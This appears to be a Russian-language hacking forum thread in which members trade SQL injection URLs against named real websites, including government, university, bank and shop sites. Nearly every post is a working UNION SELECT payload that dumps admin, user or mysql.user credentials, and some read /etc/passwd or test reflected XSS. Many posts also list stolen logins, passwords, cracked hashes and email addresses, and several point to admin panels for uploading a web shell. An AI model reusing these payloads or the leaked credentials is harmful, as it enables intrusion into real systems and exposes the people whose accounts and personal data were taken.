http://www.cahiersdufoot.net/article.php?id=-2391%20union%20select%201,2,3,id,concat(login,char (58),password),6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20%20from%20admin/*
7k юзеров, открытые пароли...

http://www.michaelpollan.com/article.php?id=-32+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.nivisec.com/article.php?l=vi&ar=-15+union+select+1,2,3,concat(user(),0x3a,version() ),5,6/*
http://duckhenge.uoregon.edu/io/article?id=-264+union+select+1,version(),3,4,5,6,7,user(),9,10 ,11,12,13,14,15,16/*

www.ChineSejetPilot.com


http://www.chinesejetpilot.com/index.php?ID=-1+order+by+6/*

http://www.lrv.lt/main.php?cat=3&gr=-1+union+select+user(),2,3+/*

http://journalism.berkeley.edu/events/details.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53+/*
Удаляем пробелы

http://ezonet.ru/event.php?nid=-1244+union+select+1,2,3,user(),5,6,7,8,9,10/*

http://www.arcade.sg/full.php?id=-217+union+select+concat(username,0x3a,password)+fr om+users/*
http://www.tectonic.co.za/view.php?id=-1377+union+select+concat(username,0x3a,password),2 +from+users/*
http://www.oudtshoorninfo.com/culture.php?id=-7+union+select+1,version()/*&category=22

gov.tr again :o

http://www.narlidere-bld.gov.tr/default.asp?link=haber&no=1+union+select+0,1,2,sifre,4,5,6,7,8,9,0+from+s ifre

User: narlı
Pass: narlı
Panel: /admin

http://www.sexysexy.ru/list.php?g=18&link=-1+union+select+1,concat(name,char(58),email,char(5 8),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+ from+autors/*

http://auto-mir.org/?context=catalog&type=24'
http://www.auto-sakhalin.ru/?context=5'
http://www.capital-avto.ru/foto.php?lnk=23'
http://www.vsk.ru/vsk_site/uslugi_dlya_grazhdan/strahovanie_ot_neschastnogo_sluchaya/?id_art=89872'
http://michinokubank.ru/index.php?page=31&id=38'
http://www.landliz.com/?id=1'
http://elit.sakhalin.org/?id=4&theme=1'
http://sakhtec.ru/?context=5'
http://www.gaks.ru/?page=news&p=0&id=30'
http://www.valma.com/?page=1'
http://www.garant.ru/banner/click.php3?bannerID=26'
http://www.referent.ru/responses/full.php?indeximg=0044'
http://www.ingos.ru/ru/news/releases/index.php?id4=-1
http://www.ros.ru/ru/press-center/news/archive/index.php?id4=1160'
http://dagun.sakh.ru/ru/main/information/tel_line/index.shtml?SECTION_ID=391&SECTION_ID=391&LIBRARY_ID=5'
http://yuzhno.sakh.ru/ru/vote.shtml?vote_question_id=10'
http://dmp.mgopu.ru/searchTopics.php?t1=2&t2=1&t3=1'
http://sakhwildnat.ru/?context=3&lang=1'
http://www.dsv.ru/shareholder.php?id=-24
http://www.dsc.ru/rus.php?id=1'
http://www.sakhalin.org/?context=-1
http://www.jmsoft.ru/?razdel=Услуги&id=5'
http://www.digitaldevice.ru/?page=&p=-1
http://www.coland.ru/index.php?keyword=%E0%E3%E0&Itemid=0&option=com_virtuemart&page=1'
http://www.referent.ru/responses/full.php?indeximg=0044'
http://www.lgchem.ru/window/main.jsp?m=6&mode=S&Rwkind=W&Tkind=W021&cur_page=-1
http://www.club-legion.ru/news.php?id=3'2
http://sakhalin-park.ru/album.php?id=1&page=2
http://www.octoberhall.ru/text.php?id=519'
http://www.katren.ru/search.asp?SearchString=1
http://sakhalin-hospital.ru/news/1153349882'
http://www.sakhalinantiaids.ru/?context=2'
http://www.radix-sakhalin.ru/?page=1'
http://elit.sakhalin.org/?id=11&resume=1'
http://www.vvsu.ru/oiskp/default_auto.asp?IdRubric=21548'
http://www.seml.ru/?page=news&id=45'
http://www.bentam.ru/?pg=0&id=69'
http://www.sakhincentr.ru/index.pl?HTML=1'
http://newsroom.slb.com/press/newsroom/index.cfm?prid=20544'
http://sakhalin.shelfflot.com/html_rus.php?action=view&idnews=17'
http://grot-oil.ru/?page=1'
http://www.sakhalinenergy.com/en/default.asp?p=channel_home&c=2'
http://www.interramashservice.ru/?context=1'
http://www.vostok-sakhalin.ru/?context=cat&good_cat=7&PAGE=-1
http://www.kriljonservice.ru/?p=1'
http://www.club-legion.ru/news.php?id=-32
http://www.sakhalin-fantastic.ru/rus/?pg=4&p=&idbig=151'
http://www.coleman.ru/taxonomy/term/4,8'
http://www.deltaleasing.ru/success/success.php?file=267'3
http://www.vsk.ru/vsk_site/uslugi_dlya_grazhdan/strahovanie_ot_neschastnogo_sluchaya/?id_art=89872'
http://www.npfgt.ru/show_pg.php?f=fil&id=39'
http://www.sakhprint.ru/?id=1'
http://www.proffcom.org/index.php?context=1'
http://www.sakhtorg.ru/r3/?p1=9&di=259'
http://www.katren.ru/faqs.asp?subID=0&paneID=0&page=-2
http://www.seml.ru/?page=news&id=46'
http://www.gd-sakhalin.ru/?id=-1
http://www.chemwide.co.kr/product3/0matter/matter_type.jsp?prodSeq=9&locale=1'
http://www.spk.ru/news_pr.asp?nn=166'
http://www.sectors.ru/?context=view&id=1'
http://kontyr.ru/social_initiatives/1'
http://www.royaks-m.ru/pages/facilities/3/6/?id=304'
http://www.comfort-sakhalin.ru/index.php?id=2'
http://www.airagency.ru/news/default.asp?c=1'
http://www.sakhmortek2003.org/rusview.php?razdel=1'
http://www.seml.ru/?page=news&id=1'
http://safta.ru/catalog.php?g_id=452&id=55'
P.S. прошу палками не бить...искал для статистики...

о_О жжошь...
*Пошел подбирать столбцы с колонками*
http://auto-mir.org/?context=catalog&type=-24%20UNION%20SELECT%200,1,2,3,concat(name,char(58) ,pass),5,6,7,8,9,10,11,12,13%20from%20login/*

http://www.capital-avto.ru/zakaz.php?car=-13%20union%20select%201,2/*

http://michinokubank.ru/index.php?page=31&id=38%20union%20select%201,2,3,4/*

http://www.gaks.ru/?page=docs&subp=10%20order%20by%2012/*

http://www.ros.ru/ru/press-center/news/archive/index.php?id4=1160%20order%20by%2017/*

http://yuzhno.sakh.ru/ru/vote.shtml?vote_question_id=10%20order%20by%204/*

http://dmp.mgopu.ru/searchTopics.php?t1=-2%20union%20select%20concat(user,char(58),password ),2%20from%20mysql.user/*
И там 5 версия

http://www.dsc.ru/rus.php?id=-2%20union%20select%201,2,table_name,4%20from%20inf ormation_schema.tables%20limit%2016,2/*

http://www.vvsu.ru/oiskp/default_auto.asp?IdRubric=21548'
Тут mssql... если кому надо...

Все, задолбался. Потом закончу :)

АКБ "Мичиноку Банк (Москва)"
http://michinokubank.ru/index.php?page=31&id=-1+union+select+1,concat(login,0x3a,password),3,4+f rom+users+limit+1,1/*

Список юзеров:
FalinA:FalinA
khv:555
sakhalin:skhmich
1:1
meltsev:aytim

Админка:
http://michinokubank.ru/admin/

http://www.ecom-info.spb.ru/about/print.php?id=-156+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,tab le_name,15,16,17,18,19,20,21,22,22,23,24,25+from+i nformation_schema.tables+limit+41,41/*

_http://www.dagtorg.ru/main/index.php?productID=4090'

http://radioshop.net.ru/control/

http://wmsu.edu.ph/v04.0i/news2.php?id=-46+union+select+concat(username,0x3a,password),2,3 +from+users/*
http://www.taguig.gov.ph/bidding.php?ID=-2+union+select+1,2,3,4,convert(version()+using+lat in1),6,7,8,9,10,11,12,13,14,15,16,17/*
http://vryeafrikaan.co.za/lees.php?id=-610%20UNION%20SELECT%201,2,concat(username,0x3a,pa ssword),4,5,6,7,8,9+from+users/*

http://www.taguig.gov.ph/bidding.php?ID=-2+union+select+1,2,3,4,convert(concat(Blurbid,char (58),Blurbname)+using+latin1),6,7,8,9,10,11,12,13, 14,15,16,17+from+Blurb/*

http://www.taguig.gov.ph/admin/

admin:admin

ps это не лечиться =\

http://event.zontik.ru/?cat=30'+union+select+1,2,3,4,5,6,7,8,9,VERSION(), DATABASE(),12,13,14,15,16,17,18,19,20/*
ЗЫ сервант часто вырубают(

так все очень аккуратно...
http://www.smeda.org/main.php?id=-192+union+select+1,concat_ws(char(58),user(),datab ase(),version()),concat(user,char(58),password),4, 5,6,7+from+mysql.user/*

http://www.xgamestation.com/view_product.php?id=-1+union+select+1,concat(email,0x3a,password),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28+from+user+limit+0,1/*
тому, кто скажет, что за алгоритм, дам +5 =)
11к юзеров)

http://trimm.ru/php/content.php?group=3&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35/*
не подобрал таблицу =\ лень.

http://www.regulator-nhsft.gov.uk/news.php?id=-947+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19/*
http://www.netpokerinfo.com/print.php?what=news&id=-25+union+select+1,2,version(),4,5,6,7,8,9,10,11,12/*
http://www.hispanicprwire.com/news.php?l=in&id=-5742+union+select+1,2,3,4,5,6,7,8,9/*

_http://www.ksu.ru/podrobnee.php?id=-1+union+select+1,2,3,4,user(),version(),7,8,9,10,1 1/*

тут х.е.з - вроде есть, но количество колонок не подобрал

_http://www.railpictures.net/viewphoto.php?id=147766-1
_http://www.railpictures.net/viewphoto.php?id=147765
_http://www.railpictures.net/viewphoto.php?id=147765'

тут вроде обнаруживает попытку sql-inj и сессию убивает

_http://www.islamkent.com/modules.php?name=Hikaye&op=showcontent&id=-19+union+select+1/*

http://shop.camillanorrback.com/show_product.php?id=-25+union+select+1,version(),3,4,5,6,7,8,9/*

http://www.kondo-net.gr.jp/it/product_info.php?h=1'
http://www.lovely.ne.jp/amazononline/browse.php?c=1'
http://www.fresh-field.co.jp/parts/frparts.php?Pno=27&Pnum=20'
немного японцев) =)

http://82.149.168.178/friwoportal/main.php?id=11&lg=1&newsid=-244+union+select+1,2,3,concat_ws(char(58),user(),d atabase(),version()),5,6,7,8,9,10,11,12+from+mysql .user/*

http://www.sephiroth.it/file_detail.php?id=-133%20union%20select%201,2,3,4,5,6,7,8,9/*

http://cityonahillpress.com/article.php?id=-473%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12,1 3,14,15,16,17,18,19/*

http://www.franciscansinternational.org/news/article.php?id=-1130%20union%20select%201,concat(user,char(58),pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21%20from%20mysql.user/*

http://anmeldung.iao.fraunhofer.de/veranstaltung.php?id=-177%20union%20select%201,2,3,4,5,6,7,concat_ws(cha r(58),user_id,user_name,user_email,user_password), 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64%20from%20FuE751._751user/*

__:)__

http://www.tablehockey.ru/news.shtml?id=-1052+union+select+1,2,3,user(),database(),version( ),7,8/*&bs=82&bc=20

www.fm.gov.lv

Ниче не понятно, толи не выводит толи хз.
http://www.fm.gov.lv/search.php?id=-1+union+select+1/*

2Ksander
Нет там скули...
_http://www.fm.gov.lv/search.php?id=2 и
_http://www.fm.gov.lv/search.php?id=3-1 отличаются

http://selo.bg/news_details.php?id=-889+union+select+1,2,convert(version()%20using%20c p1251),4,5,6,7,8,9/*&lang=bg
http://www.gramis.com/novina.php?id=-6%20UNION%20SELECT%201,2,3,concat(username,0x3a,pa ssword),5+from+users/*
http://www.gramis.com/admin/
http://www.verticalworld.net/news/news.php?id=-419+union+select+1,2,3,table_name,5,6,7,8,9,10,11, 12,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLE S+limit+3,1/*

www.regenwald.org

http://www.regenwald.org/news.php?id=-1+union+select+1,2,3,version(),database(),user(),7 ,8,9,10,11,12,13,14/*

Как мне нравится когда удаётся всю инфу достать (версия мускула там 4):

http://www.numizmatik.ru/news/read.php?news=-1+union+select+1,2,3,concat(fio,char(58),userlogin ,char(58),userpassword,char(58),email),5,6,7,8+fro m+user/*

P.S. скуля траф жрёт - т.к. все записи выводит, так что кто за траф платит...

www.quadrasoft.com.ua

http://www.quadrasoft.com.ua/web/news.php?id=-1+union+select+1,2,concat(user(),char(58),version( )),4/*

http://www.bulfurniture.com/php/news_more.php?id=-52+union+select+1,username,3,4,5,password,7,8+from +user/*
http://www.horoskopa.com/signs.php?id=-8+union+select+1,convert(version()%20using%20cp125 1)/*
lukabloom.com
http://www.lukabloom.com/shop.php?id=-98%20UNION%20SELECT%201,2,3,4,5,concat(username,0x 3a,password),7,8,9,10,11,12,13,14+from+admin/*
user:lukabloom
password:luka_shop27
http://www.lukabloom.com/admin/ (в нашем случае админка
служит для заливки шелла) :)

Вот эту смотреть только через проксю:

Там много таблиц, есть и с более интересными названиями, но их не могу выкладывать по правилам форума, для примера таблица с юзверями.

http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,table_name,4,5+from+information _schema.tables+limit+48,1/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,column_name,4,5+from+informatio n_schema.columns+where+table_name=char(109,111,115 ,95,117,115,101,114,115)+limit+0,1/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,concat(id,char(58),name,char(58 ),username,char(58),email,char(58),password,char(5 8),usertype),4,5+from+Mambo.mos_users/*

--------------------------------------------------------------------

http://www.filmec.ru/index.php?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version())/*

http://www.rmdb.ru/?company&id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version())/*

мб было, но..
http://www.biosens.ru/index.php?res=folder&rec=-1+union+select+1,concat(login,0x3a,password)+from+ users/*
* admin:admin
* news:111
* news2:222
* birth:birth
* Andrei:4444
* Kirimov:kir251
там же пассивная xss
http://www.biosens.ru/index.php?res=folder&rec=%3Cscript%3Ealert(/xss/)%3C/script%3E

http://www.voladm.gov.ua/news.php?id=-1804+union+select+1,2,3,4,5,user,7,8,9,10,password ,12,13,14+from+mysql.user/*

http://www.tiic.ru/sub_t.php?id_ur=3&id=-1+union+select+1,2,concat(username,char(58),user_p assword)+from+forum_users/*

P.S. скуля траф жрёт - т.к. все записи выводит, так что кто за траф платит...

P.P.S вторая такая за сегодня)

2 Grey (member.php?u=25024)
http://www.tiic.ru/sub_t.php?id_ur=3&id=-1+union+select+1,2,concat(username,char(58),user_p assword)+from+forum_users+limit+1,1/*

Не дадим прожить ДОМу 3 ? :)
dom3mir.ru

Регистрируемся с любыми данными......
Далее идем изменять свою анкету...
В уязвимые поля: Район, Метро,Город пишем такой код..ну там уж как придумаете вставляете всякие sql запросы....
Далее оставляете сообщение на форуме...нажимаете на свой ник над авой....(смотрите свой профильс другой стороны типа) и вот скуль =)
Примерна такая:
Error: 1064 .... You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'onmouseover="alert('xss')""' at line 1

mssql

http://www.ballroom.ru/new/i.asp?id=6&c=133&o=-1+union+all+select+1,2,3,table_name,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+from+information_sche ma.tables--

mysql

http://stroykaveka.ru/catalog.php?enter=firm&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,ta ble_name,16,17,18,19,20,21,22,23,24+from+informati on_schema.tables+limit+58,1/*

http://moto.ru/news/motonews.php?id=-569+union+select+1,concat(login,char(58),password, char(58),email),3+from+user+limit+0,1/*

doctor-al.ru

#блог - wordpress(ru)
http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,user_login,use r_pass,user_email),5,6,7+from+wp_users/*&type=news
admin:bcbe4299f228fe2c719266277c7d360f:site_admin@ doctor-al.ru == b08323

идем дальше..
#форум - phpbb
http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,username,user_ password,user_email),5,6,7+from+phpbb_users+limit+ 1,1/*&type=news
admin:8542516f8870173d7d1daba1daaaf0a1:admin@docto r-al.ru == 12321
мда, админы не меняются :)
можете попробовать залить шелл.

и напоследок
#shop
http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ,email),5,6,7+from+shop_users+limit+0,1/*&type=news
расшифровал пару хешей ради интереса.. ничего примечательного в шопе не нашел.
nytro:827ccb0eea8a706c4c34a16891f84e7b:ruslan.shch ipun@gmail.com == 12345

думаю, пути к формам авторизации найдете сами :)

http://zjz.moc.gov.cn/cms/news.php?infoid=-2731+union+select+1,2,3,4,5,user,7,8,9,10,11,12,13 ,14,15,16,17,password,19,20,21+from+mysql.user/*

http://www.it-news.cc/index.php?type=article&ID=-0000003294%20union%20select%20concat_ws(char(58),u sername,email,user_icq,password)%20from%20itacadem y.User/*

http://duckhenge.uoregon.edu/io/article.php?id=-611%20union%20select%201,user(),3,4,5,6,7,8,9,0,11 ,12,13,14,15,16/*


http://www.michaelyon-online.com/flf/author.php?ID=-407%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,LOAD_FILE(0x2f6574632f706173737764),3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58/*


http://www.michaelyon-online.com/flf/author.php?ID=-407%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,password,33,user,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20fr om%20mysql.user/*

__:)__

A FATAL MYSQL ERROR
http://keygen.us/top/comments.php?id='+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100/*

Мот кто подберет, я так и не подобрал... хотя до 100 дошел. :)

Прошолся по шопам и настигла неудача с таблицами=\
http://www.sokkia.hu/shop/shopping/index.php?id=-10+union+select+1,AES_DECRYPT(AES_ENCRYPT(version( ),0x71),0x71),3+from+users/*
http://www.schleifer.hu/shop.php?id=-65+union+select+1,AES_DECRYPT(AES_ENCRYPT(database (),0x71),0x71),3+from+users/* http://demo.skymarket.hu/shop.php?id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(database( ),0x71),0x71),3,4+from+users/*

www.islet.ru

магаз

http://www.islet.ru/subcategory.php?SCID=-1+union+select+1,convert(version(),char)/*

http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,CHAR(60,72,49,62,104,97,99,107, 101,100,32,98,121,32,103,101,110,111,109,60,47,72, 49,62),4,5,6,7,8,9,10,11,12,13

найдено с использованием google dump-er

http://skidkivtule.ru/organizations.php?org=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12,13,14, 15,16/*

http://www.timber.ru/?show=ad&n=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8/*

http://www.mmu.ac.uk/policy/policy.php?id=-1+union+select+1,99,4,21,1,88,CHAR(60,72,49,62,104 ,97,99,107,%20101,100,32,98,121,32,103,101,110,111 ,109,60,47,72,%2049,62),66,5,5,3,4,5,6,7/*

найдено с помощью google dump-er

http://www.jezuk.co.uk/cgi-bin/view/SAX/news?id=-1+union+select+1,2,CHAR(104,101,107,32,98,121,32,1 03,101,110,111,109,45,45),4,5,6,7/*

найдено с помощью google dump-er =)

http://www.centrgroup.ru/news.php?id=-8+union+select+1,user(),version(),4,5,6,7+from+use rs/*
чтобы увидеть - Ctrl+A ;)

http://www.centrgroup.ru/news.php?id=-8+union+select+1,version(),concat(user_name,0x3a,u ser_pass),4,5,6,7+from+users/*
Vitman $):91ff3b06ff2c762ecf4a7b7b272d3752
ctrl+a там не нужен

http://www.cmsnx.com/product.about.php?id=-5%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
www.truebasport.com
http://www.truebasport.com/shop/articulo.php?id=-29+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(l ogin,0x3a,password,0x3a,id,0x3a,email),0x71),0x71) ,3,4,5,6,7,8,9,10,11,12,13+from+usuarios/*

http://www.rcn.org.uk/news/display.php?ID=-1+union+select+1,2,3,4,5,CHAR(104,101,107,32,98,12 1,32,103,101,110,111,109,45,45),7,8,9,10,11,12,13, 14/*

ух

http://www.education.ex.ac.uk/pages.php?id=-1+union+select+1,2,3,4,5,CHAR(104,101,107,32,98,12 1,32,103,101,110,111,109,45,45),7,8,9,10,11,12

я простой сталевар я варю жесть

http://www.merid.org/NDN/more.php?id=-925+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17/*
http://www.enrichuk.net/news/article/?id=-355+union+select+1,2,3,4,5,6,7,8,9+from+admin/*
http://www.consortiumuk.net/news.php?id=-16+union+select+1,2,version(),4,5,6/*

2random
http://www.enrichuk.net/news/article/?id=-355+union+select+1,concat(username,0x3a,password), 3,4,5,6,7,8,9+from+admin/*

http://slovari.299.ru/word.php?id=-1+union+select+1,concat(database(),char(58),user() )/*

http://pogoda.ru.net/weathernews.php?id=972+and+1=-1+union+select+1,2,3,4,convert(version()+using+cp1 251),6,7,8/*
таблицу не смог подобрать =\

http://metalistfans.net/news.php?id=-143+union+select+1,2,3,user(),version(),database() ,7,8,9/*

http://www.legia.net/news.php?id=-22483+union+select+1,2,3,user(),5,6,version(),data base(),9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

http://www.allaboutjazz.com/php/review_print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,versi on(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62/*
таблицу не смог подобрать =\

http://www.nchtuk.org/content.php?id=-122+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat( user,0x3a,password),0x71),0x71),3,4,5,6,7,8+from+m ysql.user/*

http://arteam.accessroot.com/tutorials.html
В поиске пишем наш код, в данном случае на примере "><script>alert('xss')</script>
Выдаст ошибку MySQL ну а там разберетесь))

попрошу без экстримизма на arteam.accessroot.com
ни4его не косить

http://www.poplavok.info/index.php?mod=article&act=art&id=-1+union+select+1,version(),3,4,5/*

Седня залез на сайт про карасей прочитать, скоро на рыбалку ездить буду, и сразу скулю нашел :D ;) )))

А кол-во столбцов может иметь неогранич кол-во? А то я тут 100 ужо проверил, но не подобрал.

http://www.my-tours.ru/calclient/biz_op.php?business_id=-1+union+select+1,2,concat(ecard_sname,char(58),eca rd_sip,char(58),ecard_semail,char(58),ecard_rname, char(58),ecard_remail,char(58),card_image,char(58) ,ecard_heading,char(58),ecard_message,char(58),eca rd_sig,char(58),card_template),4,5,6,7,8,9,10+from +card_user+limit+1,1/*

to ЛифчиС5СВ

Кто то скулю выкладывал там было за 100 колонок, а вообще смотри внимательнее мог не заметить, если к примеру вывод в тайтел.

А кол-во столбцов может иметь неогранич кол-во? А то я тут 100 ужо проверил, но не подобрал.
order+by+xxx уже не в моде?

update:
http://news.qs.kiev.ua/lenta/news_full.php?id=56484+and+2=1+union+select+1,conv ert(concat(user,0x3a,password)+using+cp1251),3,4,5 ,6,7,8,9+from+mysql.user/*

http://www.clasno.com/foto_pr.php?id=-1+union+select+1,2,3,4,convert(concat(database(),c har(58),user(),char(58),version()),char),6,7,8/*

www.reusablebags.com
http://www.reusablebags.com/news.php?id=-7+union+select+1,version(),database(),user(),5,6,7 ,8,9/*

http://www.viking.tm/product.php?id=-1%20union%20select%201,2,3,4,5,6,7/*

И шоп какой-то
http://www.proaudio.ru/product.php?id=-7898%20union%20select%201,concat_ws(char(58),passw ord,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19%20from%20users/*http://www.proaudio.ru/product.php?id=-7898%20union%20select%201,concat_ws(char(58),passw ord,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19%20from%20members/*

__:)__

e-gov.gr
http://www.e-gov.gr/article.php?sid=-2818+union+select+1,2,3,4,concat(user,0x3a,passwor d),6,7,8,9+from+mysql.user/*
http://www.armeniafund.org/press_releases/press_releases.php?id=-127%20UNION%20SELECT%201,user(),3,4,5,6,7/*

http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11/*
http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11+f rom+information_schema.columns+where+table_name=ch ar(114,101,97,100,101,114,115)+limit+0,1/*
http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,concat(readerid,char(58),reader name,char(58),readerbiography),4,5,6,7,8,9,10,11+f rom+readers/*

Вовремя работы наткулся случайно...мож кто захочет поковыряться..)
http://www.adrc.or.jp/nationframe.php?URL=./view_disaster_en.php&NationCode=392&lang=en&KEY=-1
http://lovefm.co.jp/contents/w_main3.php?oya_id=2'

http://www.mekdep.com/Top/index.php?do=rate&id=19'

http://www.ruscico.com/detail.php?lang=ru&film=-1+union+select+1,2,3,4,5,concat(user,0x3a,password ),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50+from+mysql.user+lim it+1,1/*

апдейт:
http://ostro.org/shownews_ks.php?id=-1+union+select+1,2,3,4,5/*
на таблицы не везет.. =\
http://www.fcdynamo.ru/info.php?id=-1'+union+select+concat_ws(0x3a,name,login,pass)+fr om+users+limit+2,1/*
вывода логина/пасса нет, мб таблица другая, мб еще что...
зато динамо))

__http://www.divx.it/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users%20where%20user_id%3E89650%20and% 20user_id%3C89654/*

более месяца держал эту скулю в привате, теперь могу выложить :)

89654 юзверей.
Постараюсь после дамп базы кинуть если кому надо

PS хе, только что посерфил в инете, их уже ломали, в статью углубляться не стал, возможно там чуть другая скуля __http://www.fssr.ru/hz.php?file=article&name=News&sid=6475

http://rybalka.zooclub.ru/article.php?id=-1+union+select+table_name,2,3+from+information_sch ema.tables
ничего интересного =\

http://www.forceprotection.net/news/news_article.html?id=-163+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.comingsoon.net/news/movienews.php?id=-19350+union+select+version()/*

http://www.stroypages.ru/rubrik.php?id_com=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),c har(58),user(),char(58),version()),10/*

http://gta.com.ua/vice/file_details.phtml?id=60+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

http://www.materiel-numerique.com/article.php?id=-15+union+select+1,2,3,4,5,LOAD_FILE(0x2f6574632f70 6173737764),7,8,9,10,11,12,13,14,15
=\

http://www.language-archives.org/archive.php4?id=-58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19/*

ducation.kerala.gov.in
http://www.education.kerala.gov.in/admin/news_details.php?id=-24+union+select+1,2,user,password+from+mysql.user/*
http://www.campingpuntala.it/dyn/ita/shop.php?id=-9%20UNION%20SELECT%201,2,3,AES_DECRYPT(AES_ENCRYPT (user(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16/*

http://gta.com.ua/vice/file_details.phtml?id=60+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
http://gta.com.ua/vice/file_details.phtml?id=60+union+select+1,2,3,4,5,6, 7,username,password,10,11,12,13,14,15,16,17,18,19, 20+from+admin/*

Login: admin
Pass: 2IsfJILPkOJ2

ищем админку =)

http://oculus.ru/stat.php?id=-1+union+select+1,2,3,4,5,convert(version()+using+c p1251),7,8,9,10/*
подобрать таблицу не дал секьюрити-модуль свеба =\

http://www.mnr.gov.ru/part/?act=more&id=964&pid=-429+union+select+concat(user,0x3a,password),2+from +mysql.user/*

Может и было...

http://www.cpdvd.ru/shop.shtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(n am,char(58),email,char(58),pass),14,15,16,17,18,19 ,20,21+from+users+limit+0,5/*

Т.к. скуля выводит все записи, то ограничил её лимитом что бы вывела записи с 0 по 5.

http://www.kurscom.ru/catalog.php?a=2&id_shop=-1857+union+select+1,2,3,4,5,6,7,8,9,10,11,12,VERSI ON(),14,15+from+shop/*
больше ничего не нашел :(

P,S,
http://www.kurscom.ru/catalog.php?a=2&id_shop=-1857+union+select+1,2,3,4,5,6,7,8,9,10,11,mail,pas sword,name,15+from+shop/*
name:EF EDUCATION FIRST
email:elena.ponomareva@ef.com
password:LH5029

http://www.cybersquads.ru/articles/categories.php?arttype=-1'+union+select+1,2,3,4,5,6,7,8,concat(name,'%20:% 20',password,'%20:%20',email,'%20:%20',icq,'%20:%2 0',homepage),10,11,12,13+from+users+limit+100/*

http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,concat(uname,0x3a,pass),4,5,6,7 ,8,9+from+users+limit+1,1/*
логин:пасс

http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=1'
Подробности ошибки не выдает :(

